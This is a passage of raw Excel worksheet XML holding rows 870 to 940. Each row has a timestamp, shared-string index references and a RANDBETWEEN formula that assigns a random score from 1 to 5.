    <row r="870" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A870" s="1">
        <v>43543.329224537039</v>
      </c>
      <c r="B870" t="s">
        <v>35</v>
      </c>
      <c r="C870" t="s">
        <v>48</v>
      </c>
      <c r="E870" s="2" t="s">
        <v>972</v>
      </c>
      <c r="F870">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A871" s="1">
        <v>43543.326527777775</v>
      </c>
      <c r="B871" t="s">
        <v>9</v>
      </c>
      <c r="C871" t="s">
        <v>197</v>
      </c>
      <c r="E871" t="s">
        <v>973</v>
      </c>
      <c r="F871">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="872" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A872" s="1">
        <v>43543.323148148149</v>
      </c>
      <c r="B872" t="s">
        <v>22</v>
      </c>
      <c r="C872" t="s">
        <v>6</v>
      </c>
      <c r="D872" t="s">
        <v>25</v>
      </c>
      <c r="E872" s="2" t="s">
        <v>974</v>
      </c>
      <c r="F872">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A873" s="1">
        <v>43543.292511574073</v>
      </c>
      <c r="B873" t="s">
        <v>9</v>
      </c>
      <c r="C873" t="s">
        <v>41</v>
      </c>
      <c r="E873" t="s">
        <v>975</v>
      </c>
      <c r="F873">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="874" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A874" s="1">
        <v>43543.227592592593</v>
      </c>
      <c r="B874" t="s">
        <v>22</v>
      </c>
      <c r="C874" t="s">
        <v>48</v>
      </c>
      <c r="E874" s="2" t="s">
        <v>976</v>
      </c>
      <c r="F874">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="875" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A875" s="1">
        <v>43543.221875000003</v>
      </c>
      <c r="B875" t="s">
        <v>9</v>
      </c>
      <c r="C875" t="s">
        <v>48</v>
      </c>
      <c r="E875" s="2" t="s">
        <v>977</v>
      </c>
      <c r="F875">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A876" s="1">
        <v>43543.185925925929</v>
      </c>
      <c r="B876" t="s">
        <v>19</v>
      </c>
      <c r="C876" t="s">
        <v>118</v>
      </c>
      <c r="E876" t="s">
        <v>978</v>
      </c>
      <c r="F876">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="877" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A877" s="1">
        <v>43543.158877314818</v>
      </c>
      <c r="B877" t="s">
        <v>13</v>
      </c>
      <c r="C877" t="s">
        <v>166</v>
      </c>
      <c r="E877" s="2" t="s">
        <v>979</v>
      </c>
      <c r="F877">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="878" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A878" s="1">
        <v>43543.158090277779</v>
      </c>
      <c r="B878" t="s">
        <v>19</v>
      </c>
      <c r="C878" t="s">
        <v>41</v>
      </c>
      <c r="E878" s="2" t="s">
        <v>980</v>
      </c>
      <c r="F878">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="879" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A879" s="1">
        <v>43543.138842592591</v>
      </c>
      <c r="B879" t="s">
        <v>19</v>
      </c>
      <c r="C879" t="s">
        <v>318</v>
      </c>
      <c r="E879" s="2" t="s">
        <v>981</v>
      </c>
      <c r="F879">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A880" s="1">
        <v>43543.098981481482</v>
      </c>
      <c r="B880" t="s">
        <v>19</v>
      </c>
      <c r="C880" t="s">
        <v>10</v>
      </c>
      <c r="D880" t="s">
        <v>817</v>
      </c>
      <c r="E880" t="s">
        <v>982</v>
      </c>
      <c r="F880">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="881" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A881" s="1">
        <v>43543.095775462964</v>
      </c>
      <c r="B881" t="s">
        <v>5</v>
      </c>
      <c r="C881" t="s">
        <v>41</v>
      </c>
      <c r="E881" s="2" t="s">
        <v>983</v>
      </c>
      <c r="F881">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="882" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A882" s="1">
        <v>43543.077719907407</v>
      </c>
      <c r="B882" t="s">
        <v>13</v>
      </c>
      <c r="C882" t="s">
        <v>301</v>
      </c>
      <c r="E882" s="2" t="s">
        <v>984</v>
      </c>
      <c r="F882">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="883" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A883" s="1">
        <v>43543.04414351852</v>
      </c>
      <c r="B883" t="s">
        <v>22</v>
      </c>
      <c r="C883" t="s">
        <v>41</v>
      </c>
      <c r="E883" t="s">
        <v>985</v>
      </c>
      <c r="F883">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A884" s="1">
        <v>43543.043090277781</v>
      </c>
      <c r="B884" t="s">
        <v>9</v>
      </c>
      <c r="C884" t="s">
        <v>73</v>
      </c>
      <c r="E884" t="s">
        <v>986</v>
      </c>
      <c r="F884">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="885" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A885" s="1">
        <v>43543.016701388886</v>
      </c>
      <c r="B885" t="s">
        <v>22</v>
      </c>
      <c r="C885" t="s">
        <v>253</v>
      </c>
      <c r="E885" s="2" t="s">
        <v>987</v>
      </c>
      <c r="F885">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A886" s="1">
        <v>43542.97420138889</v>
      </c>
      <c r="B886" t="s">
        <v>9</v>
      </c>
      <c r="C886" t="s">
        <v>73</v>
      </c>
      <c r="E886" t="s">
        <v>988</v>
      </c>
      <c r="F886">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A887" s="1">
        <v>43542.950555555559</v>
      </c>
      <c r="B887" t="s">
        <v>5</v>
      </c>
      <c r="C887" t="s">
        <v>319</v>
      </c>
      <c r="D887" t="s">
        <v>320</v>
      </c>
      <c r="E887" t="s">
        <v>989</v>
      </c>
      <c r="F887">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="888" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A888" s="1">
        <v>43542.948321759257</v>
      </c>
      <c r="B888" t="s">
        <v>5</v>
      </c>
      <c r="C888" t="s">
        <v>410</v>
      </c>
      <c r="E888" s="2" t="s">
        <v>990</v>
      </c>
      <c r="F888">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A889" s="1">
        <v>43542.846180555556</v>
      </c>
      <c r="B889" t="s">
        <v>13</v>
      </c>
      <c r="C889" t="s">
        <v>139</v>
      </c>
      <c r="E889" t="s">
        <v>991</v>
      </c>
      <c r="F889">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A890" s="1">
        <v>43542.79583333333</v>
      </c>
      <c r="B890" t="s">
        <v>19</v>
      </c>
      <c r="C890" t="s">
        <v>10</v>
      </c>
      <c r="D890" t="s">
        <v>6</v>
      </c>
      <c r="E890" t="s">
        <v>992</v>
      </c>
      <c r="F890">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="891" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A891" s="1">
        <v>43542.777800925927</v>
      </c>
      <c r="B891" t="s">
        <v>22</v>
      </c>
      <c r="C891" t="s">
        <v>993</v>
      </c>
      <c r="D891" t="s">
        <v>20</v>
      </c>
      <c r="E891" s="2" t="s">
        <v>994</v>
      </c>
      <c r="F891">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A892" s="1">
        <v>43542.737141203703</v>
      </c>
      <c r="B892" t="s">
        <v>13</v>
      </c>
      <c r="C892" t="s">
        <v>10</v>
      </c>
      <c r="D892" t="s">
        <v>52</v>
      </c>
      <c r="E892" t="s">
        <v>995</v>
      </c>
      <c r="F892">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="893" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A893" s="1">
        <v>43542.733518518522</v>
      </c>
      <c r="B893" t="s">
        <v>19</v>
      </c>
      <c r="C893" t="s">
        <v>10</v>
      </c>
      <c r="D893" t="s">
        <v>17</v>
      </c>
      <c r="E893" s="2" t="s">
        <v>996</v>
      </c>
      <c r="F893">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="894" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A894" s="1">
        <v>43542.732372685183</v>
      </c>
      <c r="B894" t="s">
        <v>5</v>
      </c>
      <c r="C894" t="s">
        <v>10</v>
      </c>
      <c r="D894" t="s">
        <v>17</v>
      </c>
      <c r="E894" s="2" t="s">
        <v>997</v>
      </c>
      <c r="F894">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A895" s="1">
        <v>43542.73065972222</v>
      </c>
      <c r="B895" t="s">
        <v>19</v>
      </c>
      <c r="C895" t="s">
        <v>10</v>
      </c>
      <c r="D895" t="s">
        <v>6</v>
      </c>
      <c r="E895" t="s">
        <v>998</v>
      </c>
      <c r="F895">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A896" s="1">
        <v>43542.730011574073</v>
      </c>
      <c r="B896" t="s">
        <v>19</v>
      </c>
      <c r="C896" t="s">
        <v>10</v>
      </c>
      <c r="D896" t="s">
        <v>494</v>
      </c>
      <c r="E896" t="s">
        <v>999</v>
      </c>
      <c r="F896">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A897" s="1">
        <v>43542.71570601852</v>
      </c>
      <c r="B897" t="s">
        <v>9</v>
      </c>
      <c r="C897" t="s">
        <v>10</v>
      </c>
      <c r="D897" t="s">
        <v>112</v>
      </c>
      <c r="E897" t="s">
        <v>1000</v>
      </c>
      <c r="F897">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="898" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A898" s="1">
        <v>43542.698761574073</v>
      </c>
      <c r="B898" t="s">
        <v>19</v>
      </c>
      <c r="C898" t="s">
        <v>10</v>
      </c>
      <c r="D898" t="s">
        <v>89</v>
      </c>
      <c r="E898" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="F898">
        <f t="shared" ref="F898:F961" ca="1" si="14">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="899" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A899" s="1">
        <v>43542.696203703701</v>
      </c>
      <c r="B899" t="s">
        <v>13</v>
      </c>
      <c r="C899" t="s">
        <v>10</v>
      </c>
      <c r="D899" t="s">
        <v>6</v>
      </c>
      <c r="E899" t="s">
        <v>1002</v>
      </c>
      <c r="F899">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A900" s="1">
        <v>43542.672395833331</v>
      </c>
      <c r="B900" t="s">
        <v>5</v>
      </c>
      <c r="C900" t="s">
        <v>10</v>
      </c>
      <c r="D900" t="s">
        <v>17</v>
      </c>
      <c r="E900" t="s">
        <v>1003</v>
      </c>
      <c r="F900">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A901" s="1">
        <v>43542.657152777778</v>
      </c>
      <c r="B901" t="s">
        <v>22</v>
      </c>
      <c r="C901" t="s">
        <v>10</v>
      </c>
      <c r="D901" t="s">
        <v>23</v>
      </c>
      <c r="E901" t="s">
        <v>31</v>
      </c>
      <c r="F901">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A902" s="1">
        <v>43542.65283564815</v>
      </c>
      <c r="B902" t="s">
        <v>19</v>
      </c>
      <c r="C902" t="s">
        <v>10</v>
      </c>
      <c r="D902" t="s">
        <v>52</v>
      </c>
      <c r="E902" t="s">
        <v>1004</v>
      </c>
      <c r="F902">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A903" s="1">
        <v>43542.627511574072</v>
      </c>
      <c r="B903" t="s">
        <v>22</v>
      </c>
      <c r="C903" t="s">
        <v>10</v>
      </c>
      <c r="D903" t="s">
        <v>56</v>
      </c>
      <c r="E903" t="s">
        <v>1005</v>
      </c>
      <c r="F903">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A904" s="1">
        <v>43542.612129629626</v>
      </c>
      <c r="B904" t="s">
        <v>19</v>
      </c>
      <c r="C904" t="s">
        <v>10</v>
      </c>
      <c r="D904" t="s">
        <v>11</v>
      </c>
      <c r="E904" t="s">
        <v>1006</v>
      </c>
      <c r="F904">
        <f t="shared" ca="1" si="14"/>
        <v>3</v>
      </c>
    </row>
    <row r="905" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A905" s="1">
        <v>43542.608530092592</v>
      </c>
      <c r="B905" t="s">
        <v>5</v>
      </c>
      <c r="C905" t="s">
        <v>63</v>
      </c>
      <c r="E905" s="2" t="s">
        <v>1007</v>
      </c>
      <c r="F905">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A906" s="1">
        <v>43542.608101851853</v>
      </c>
      <c r="B906" t="s">
        <v>19</v>
      </c>
      <c r="C906" t="s">
        <v>10</v>
      </c>
      <c r="D906" t="s">
        <v>46</v>
      </c>
      <c r="E906" t="s">
        <v>1008</v>
      </c>
      <c r="F906">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="907" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A907" s="1">
        <v>43542.60056712963</v>
      </c>
      <c r="B907" t="s">
        <v>5</v>
      </c>
      <c r="C907" t="s">
        <v>10</v>
      </c>
      <c r="D907" t="s">
        <v>20</v>
      </c>
      <c r="E907" s="2" t="s">
        <v>1009</v>
      </c>
      <c r="F907">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A908" s="1">
        <v>43542.590428240743</v>
      </c>
      <c r="B908" t="s">
        <v>5</v>
      </c>
      <c r="C908" t="s">
        <v>41</v>
      </c>
      <c r="F908">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="909" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A909" s="1">
        <v>43542.588229166664</v>
      </c>
      <c r="B909" t="s">
        <v>35</v>
      </c>
      <c r="C909" t="s">
        <v>6</v>
      </c>
      <c r="D909" t="s">
        <v>821</v>
      </c>
      <c r="E909" s="2" t="s">
        <v>1010</v>
      </c>
      <c r="F909">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A910" s="1">
        <v>43542.58699074074</v>
      </c>
      <c r="B910" t="s">
        <v>5</v>
      </c>
      <c r="C910" t="s">
        <v>16</v>
      </c>
      <c r="E910" t="s">
        <v>1011</v>
      </c>
      <c r="F910">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="911" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A911" s="1">
        <v>43542.582962962966</v>
      </c>
      <c r="B911" t="s">
        <v>5</v>
      </c>
      <c r="C911" t="s">
        <v>16</v>
      </c>
      <c r="E911" s="2" t="s">
        <v>1012</v>
      </c>
      <c r="F911">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="912" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A912" s="1">
        <v>43542.579386574071</v>
      </c>
      <c r="B912" t="s">
        <v>19</v>
      </c>
      <c r="C912" t="s">
        <v>16</v>
      </c>
      <c r="E912" s="2" t="s">
        <v>1013</v>
      </c>
      <c r="F912">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A913" s="1">
        <v>43542.578310185185</v>
      </c>
      <c r="B913" t="s">
        <v>19</v>
      </c>
      <c r="C913" t="s">
        <v>10</v>
      </c>
      <c r="D913" t="s">
        <v>6</v>
      </c>
      <c r="E913" t="s">
        <v>1014</v>
      </c>
      <c r="F913">
        <f t="shared" ca="1" si="14"/>
        <v>3</v>
      </c>
    </row>
    <row r="914" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A914" s="1">
        <v>43542.576701388891</v>
      </c>
      <c r="B914" t="s">
        <v>19</v>
      </c>
      <c r="C914" t="s">
        <v>10</v>
      </c>
      <c r="D914" t="s">
        <v>36</v>
      </c>
      <c r="E914" s="2" t="s">
        <v>1015</v>
      </c>
      <c r="F914">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A915" s="1">
        <v>43542.572581018518</v>
      </c>
      <c r="B915" t="s">
        <v>19</v>
      </c>
      <c r="C915" t="s">
        <v>10</v>
      </c>
      <c r="D915" t="s">
        <v>163</v>
      </c>
      <c r="E915" t="s">
        <v>1016</v>
      </c>
      <c r="F915">
        <f t="shared" ca="1" si="14"/>
        <v>3</v>
      </c>
    </row>
    <row r="916" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A916" s="1">
        <v>43542.55678240741</v>
      </c>
      <c r="B916" t="s">
        <v>5</v>
      </c>
      <c r="C916" t="s">
        <v>173</v>
      </c>
      <c r="E916" s="2" t="s">
        <v>1017</v>
      </c>
      <c r="F916">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A917" s="1">
        <v>43542.555</v>
      </c>
      <c r="B917" t="s">
        <v>13</v>
      </c>
      <c r="C917" t="s">
        <v>10</v>
      </c>
      <c r="D917" t="s">
        <v>11</v>
      </c>
      <c r="E917" t="s">
        <v>1018</v>
      </c>
      <c r="F917">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="918" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A918" s="1">
        <v>43542.548703703702</v>
      </c>
      <c r="B918" t="s">
        <v>13</v>
      </c>
      <c r="C918" t="s">
        <v>48</v>
      </c>
      <c r="E918" s="2" t="s">
        <v>1019</v>
      </c>
      <c r="F918">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A919" s="1">
        <v>43542.541284722225</v>
      </c>
      <c r="B919" t="s">
        <v>5</v>
      </c>
      <c r="C919" t="s">
        <v>10</v>
      </c>
      <c r="D919" t="s">
        <v>80</v>
      </c>
      <c r="E919" t="s">
        <v>1020</v>
      </c>
      <c r="F919">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A920" s="1">
        <v>43542.53392361111</v>
      </c>
      <c r="B920" t="s">
        <v>19</v>
      </c>
      <c r="C920" t="s">
        <v>10</v>
      </c>
      <c r="D920" t="s">
        <v>494</v>
      </c>
      <c r="E920" t="s">
        <v>1021</v>
      </c>
      <c r="F920">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="921" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A921" s="1">
        <v>43542.526469907411</v>
      </c>
      <c r="B921" t="s">
        <v>22</v>
      </c>
      <c r="C921" t="s">
        <v>65</v>
      </c>
      <c r="E921" s="2" t="s">
        <v>1022</v>
      </c>
      <c r="F921">
        <f t="shared" ca="1" si="14"/>
        <v>3</v>
      </c>
    </row>
    <row r="922" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A922" s="1">
        <v>43542.520972222221</v>
      </c>
      <c r="B922" t="s">
        <v>19</v>
      </c>
      <c r="C922" t="s">
        <v>48</v>
      </c>
      <c r="E922" s="2" t="s">
        <v>1023</v>
      </c>
      <c r="F922">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="923" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A923" s="1">
        <v>43542.500208333331</v>
      </c>
      <c r="B923" t="s">
        <v>13</v>
      </c>
      <c r="C923" t="s">
        <v>10</v>
      </c>
      <c r="D923" t="s">
        <v>158</v>
      </c>
      <c r="E923" s="2" t="s">
        <v>1024</v>
      </c>
      <c r="F923">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="924" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A924" s="1">
        <v>43542.494756944441</v>
      </c>
      <c r="B924" t="s">
        <v>13</v>
      </c>
      <c r="C924" t="s">
        <v>63</v>
      </c>
      <c r="E924" s="2" t="s">
        <v>1025</v>
      </c>
      <c r="F924">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A925" s="1">
        <v>43542.493715277778</v>
      </c>
      <c r="B925" t="s">
        <v>19</v>
      </c>
      <c r="C925" t="s">
        <v>10</v>
      </c>
      <c r="D925" t="s">
        <v>290</v>
      </c>
      <c r="E925" t="s">
        <v>1026</v>
      </c>
      <c r="F925">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A926" s="1">
        <v>43542.487199074072</v>
      </c>
      <c r="B926" t="s">
        <v>5</v>
      </c>
      <c r="C926" t="s">
        <v>10</v>
      </c>
      <c r="D926" t="s">
        <v>667</v>
      </c>
      <c r="E926" t="s">
        <v>1027</v>
      </c>
      <c r="F926">
        <f t="shared" ca="1" si="14"/>
        <v>3</v>
      </c>
    </row>
    <row r="927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A927" s="1">
        <v>43542.485034722224</v>
      </c>
      <c r="B927" t="s">
        <v>13</v>
      </c>
      <c r="C927" t="s">
        <v>10</v>
      </c>
      <c r="D927" t="s">
        <v>36</v>
      </c>
      <c r="E927" t="s">
        <v>1028</v>
      </c>
      <c r="F927">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A928" s="1">
        <v>43542.474305555559</v>
      </c>
      <c r="B928" t="s">
        <v>13</v>
      </c>
      <c r="C928" t="s">
        <v>10</v>
      </c>
      <c r="D928" t="s">
        <v>23</v>
      </c>
      <c r="F928">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A929" s="1">
        <v>43542.474270833336</v>
      </c>
      <c r="B929" t="s">
        <v>13</v>
      </c>
      <c r="C929" t="s">
        <v>17</v>
      </c>
      <c r="E929" t="s">
        <v>1029</v>
      </c>
      <c r="F929">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A930" s="1">
        <v>43542.47</v>
      </c>
      <c r="B930" t="s">
        <v>22</v>
      </c>
      <c r="C930" t="s">
        <v>6</v>
      </c>
      <c r="D930" t="s">
        <v>25</v>
      </c>
      <c r="F930">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="931" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A931" s="1">
        <v>43542.465474537035</v>
      </c>
      <c r="B931" t="s">
        <v>5</v>
      </c>
      <c r="C931" t="s">
        <v>559</v>
      </c>
      <c r="E931" s="2" t="s">
        <v>1030</v>
      </c>
      <c r="F931">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A932" s="1">
        <v>43542.463310185187</v>
      </c>
      <c r="B932" t="s">
        <v>19</v>
      </c>
      <c r="C932" t="s">
        <v>10</v>
      </c>
      <c r="D932" t="s">
        <v>107</v>
      </c>
      <c r="E932" t="s">
        <v>1031</v>
      </c>
      <c r="F932">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="933" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A933" s="1">
        <v>43542.455590277779</v>
      </c>
      <c r="B933" t="s">
        <v>19</v>
      </c>
      <c r="C933" t="s">
        <v>41</v>
      </c>
      <c r="E933" s="2" t="s">
        <v>1032</v>
      </c>
      <c r="F933">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A934" s="1">
        <v>43542.453298611108</v>
      </c>
      <c r="B934" t="s">
        <v>19</v>
      </c>
      <c r="C934" t="s">
        <v>10</v>
      </c>
      <c r="D934" t="s">
        <v>112</v>
      </c>
      <c r="E934" t="s">
        <v>1033</v>
      </c>
      <c r="F934">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A935" s="1">
        <v>43542.453275462962</v>
      </c>
      <c r="B935" t="s">
        <v>22</v>
      </c>
      <c r="C935" t="s">
        <v>6</v>
      </c>
      <c r="D935" t="s">
        <v>25</v>
      </c>
      <c r="F935">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="936" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A936" s="1">
        <v>43542.438136574077</v>
      </c>
      <c r="B936" t="s">
        <v>19</v>
      </c>
      <c r="C936" t="s">
        <v>48</v>
      </c>
      <c r="D936" t="s">
        <v>312</v>
      </c>
      <c r="E936" s="2" t="s">
        <v>1034</v>
      </c>
      <c r="F936">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="937" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A937" s="1">
        <v>43542.413877314815</v>
      </c>
      <c r="B937" t="s">
        <v>13</v>
      </c>
      <c r="C937" t="s">
        <v>10</v>
      </c>
      <c r="D937" t="s">
        <v>80</v>
      </c>
      <c r="E937" s="2" t="s">
        <v>1035</v>
      </c>
      <c r="F937">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="938" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A938" s="1">
        <v>43542.413831018515</v>
      </c>
      <c r="B938" t="s">
        <v>5</v>
      </c>
      <c r="C938" t="s">
        <v>454</v>
      </c>
      <c r="D938" t="s">
        <v>1036</v>
      </c>
      <c r="E938" s="2" t="s">
        <v>1037</v>
      </c>
      <c r="F938">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="939" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A939" s="1">
        <v>43542.412939814814</v>
      </c>
      <c r="B939" t="s">
        <v>5</v>
      </c>
      <c r="C939" t="s">
        <v>6</v>
      </c>
      <c r="D939" t="s">
        <v>194</v>
      </c>
      <c r="E939" s="2" t="s">
        <v>1038</v>
      </c>
      <c r="F939">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="940" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A940" s="1">
        <v>43542.404479166667</v>
      </c>
      <c r="B940" t="s">
        <v>13</v>
      </c>
      <c r="C940" t="s">
        <v>6</v>
      </c>
      <c r="D940" t="s">
        <v>194</v>
      </c>
      <c r="E940" s="2" t="s">
        <v>1039</v>
      </c>
      <c r="F940">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
